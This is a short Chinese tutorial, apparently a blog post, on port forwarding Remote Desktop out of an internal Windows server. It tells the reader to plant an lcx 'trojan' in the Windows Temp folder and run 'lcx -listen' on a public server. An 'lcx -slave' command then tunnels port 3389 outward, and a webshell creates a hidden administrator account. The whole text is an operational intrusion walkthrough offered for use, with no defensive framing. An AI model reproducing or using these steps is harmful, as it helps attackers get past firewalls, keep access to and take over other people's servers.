端口转发
端口转发(复现)
0x00 前期准备
1.环境准备:
端口转发的目的是,和一个未开启3389端口的内网服务器远程连接。所以我们需要准备的是一台内网服务器,和一台公网服务器。
2.条件准备
想要进行端口转发,首先我们要先知道这台内网服务器远程连接的端口是哪个。
利用代码:
tasklist /svc
找到其中的TermService这一项,并且记住前面的数字。
接下来,我们就需要通过这串数字来告诉我们,这台内网服务器远程连接的端口是什么。
利用代码:
netstat -ano | find "1604"
到这一步,我们前期需要做的准备就已经完成了。
0x01 端口转发
1.植入木马
帮助我们完成端口转发的木马,我们需要分别将其放入到公网服务器,和上传到内网服务器中。
公网服务器可以随意的选择你想放的地方,但是内网服务器,建议将文件上传到windows目录下的Temp文件夹里。
因为这个文件夹默认是具有读写权限的。
2.监听公网服务器的端口
首先,我们需要先在公网服务器上运行木马,并且监听本机的两个端口。
这两个端口就是我们之后将内网的3389转发出来之后,用到连接的端口。
利用代码:
lcx
当看到这一幕的时候,木马就已经开始运行了,接下来,我们要监听本机的1996端口,到2019端口上去。
利用代码:
lcx -listen 1996 2019
做完了这一步,我们需要做的工作,就很简单了。
启动我们已经植入到内网服务器上的木马,将内网的3389端口转发到我们外网的1996端口。
利用代码:
C:/windows/Temp/lcx.exe -slave 公网网址 1996 127.0.0.1 3389
执行到这一步,如果看到公网服务器中的cmd多出如下的字符,则证明端口转发已经成功。
接下来,我们在公网服务器上,就可以通过127.0.0.1:2019端口和内网服务器建立远程连接了。
这个时候,我们可以再在内网服务器上利用webshell创建一个管理员组的用户,就可以登录了。
{{uploading-image-346617.png(uploading...)}}
到此,端口转发就已经完成了。